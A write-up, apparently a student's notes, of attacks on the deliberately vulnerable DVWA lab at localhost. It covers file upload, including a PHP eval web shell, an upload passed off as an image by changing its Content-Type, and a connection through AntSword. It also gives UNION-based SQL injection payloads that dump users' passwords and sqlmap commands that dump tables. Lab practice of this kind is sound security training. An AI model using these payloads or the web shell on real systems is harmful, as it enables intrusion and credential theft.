DVWA WriteUp

Pub Date: 2023-10-16

http://127.0.0.1/dvwa/login.php
id:admin
pass:password

File Upload

low level

直接上传eval.php 然后用亮剑连接

fild all sub urls

 sudo feroxbuster --url 127.0.0.1/dvwa/vulnerabilities/upload

eval.php

<?php @eval($_POST['attack']) ?>

![image-20231015124156718]((../../img_list/image20231015124156718.png)

127.0.0.1/dvwa/vulnerabilities/upload/../../hackable/uploads/eval.php

open AndSword add data

![image-20231015124510066]((../../img_list/image20231015124510066.png)

![image-20231015124816150]((../../img_list/image20231015124816150.png)

medium level

直接上传eval.php 用Burp抓包

<?php @eval($_POST['attack']) ?>

![image-20231015130030326]((../../img_list/image20231015130030326.png)

把Content-Type改成image/png

![image-20231015130323991]((../../img_list/image20231015130323991.png)

下一步是用AntSword连接

127.0.0.1/dvwa/vulnerabilities/upload/../../hackable/uploads/eval.php

open AndSword add data

![image-20231015124510066]((../../img_list/image20231015124510066.png)

![image-20231015124816150]((../../img_list/image20231015124816150.png)

SQL Injection

see source code

http://127.0.0.1/dvwa/vulnerabilities/view_source_all.php?id=sqli

low level

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];
    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?> 

allways true scenario

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

%' or 0=0#
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0#';";

this payload return first name last name

![image-20231014112247261]((../../img_list/image20231014112247261.png)

display database version

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

%' or 0=0 union select null, version() #
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() #;";
#OR
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select @@version,1 #;

![image-20231014113420195]((../../img_list/image20231014113420195.png)

display database user

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

%' or 0=0 union select null, user() #
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() #;";
#OR
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select user(),1 #;

![image-20231014114608303]((../../img_list/image20231014114608303.png)

display database name

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

%' or 0=0 union select null, database() #
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() #;";
#OR
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select user(),1 #;

![image-20231014115207020]((../../img_list/image20231014115207020.png)

display all table_names from information_schema

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

%' and 1=0 union select null, table_name COLLATE utf8_general_ci from information_schema.tables #

SELECT first_name, last_name COLLATE utf8_general_ci FROM users WHERE user_id = '%' and 1=0 
union 
select null, table_name COLLATE utf8_general_ci from information_schema.tables#;

![image-20231014120916243]((../../img_list/image20231014120916243.png)

display all user tables from information_schema

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

%' and 1=0 union select null, table_name COLLATE utf8_general_ci from information_schema.tables where table_name like 'user%'#

SELECT first_name, last_name COLLATE utf8_general_ci FROM users WHERE user_id = '%' and 1=0 
union 
select null, table_name COLLATE utf8_general_ci from information_schema.tables where table_name like 'user%'#;

![image-20231014121402241]((../../img_list/image20231014121402241.png)

display all column feilds from users table

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #;";
# 0x0a 是空格
SELECT first_name, last_name COLLATE utf8_general_ci FROM users WHERE user_id = '%' and 1=0 
union 
select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users;

![image-20231014115912995]((../../img_list/image20231014115912995.png)

medium level

<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    //mysql_close();
}
?> 
$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

get database name

id=-1 UNION SELECT 1,DATABASE() &Submit=Submit

![image-20231018215529821]((../../img_list/image20231018215529821.png)

get tables from database

"base table".encode("utf-8").hex() #0x62617365207461626c65
"dvwa".encode("utf-8").hex() #0x64767761
id=-1 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_type=0x62617365207461626c65 AND table_schema=0x64767761&Submit=Submit

![image-20231018214830805]((../../img_list/image20231018214830805.png)

get columns from users table

"users".encode("utf-8").hex() #0x7573657273
id=-1 UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name=0x7573657273 #&Submit=Submit

![image-20231018220055576]((../../img_list/image20231018220055576.png)

get user,password from users table

id=-1 UNION SELECT user, password FROM users #&Submit=Submit

![image-20231018220308709]((../../img_list/image20231018220308709.png)

SQL Injection (Blind)

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=sksah6ltdoh1c20mtoi5q6q5fb" --data="id=1&Submit=Submit" -p id --dbs

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=sksah6ltdoh1c20mtoi5q6q5fb" --data="id=1&Submit=Submit" -p id -T users --batch --threads 5 --dump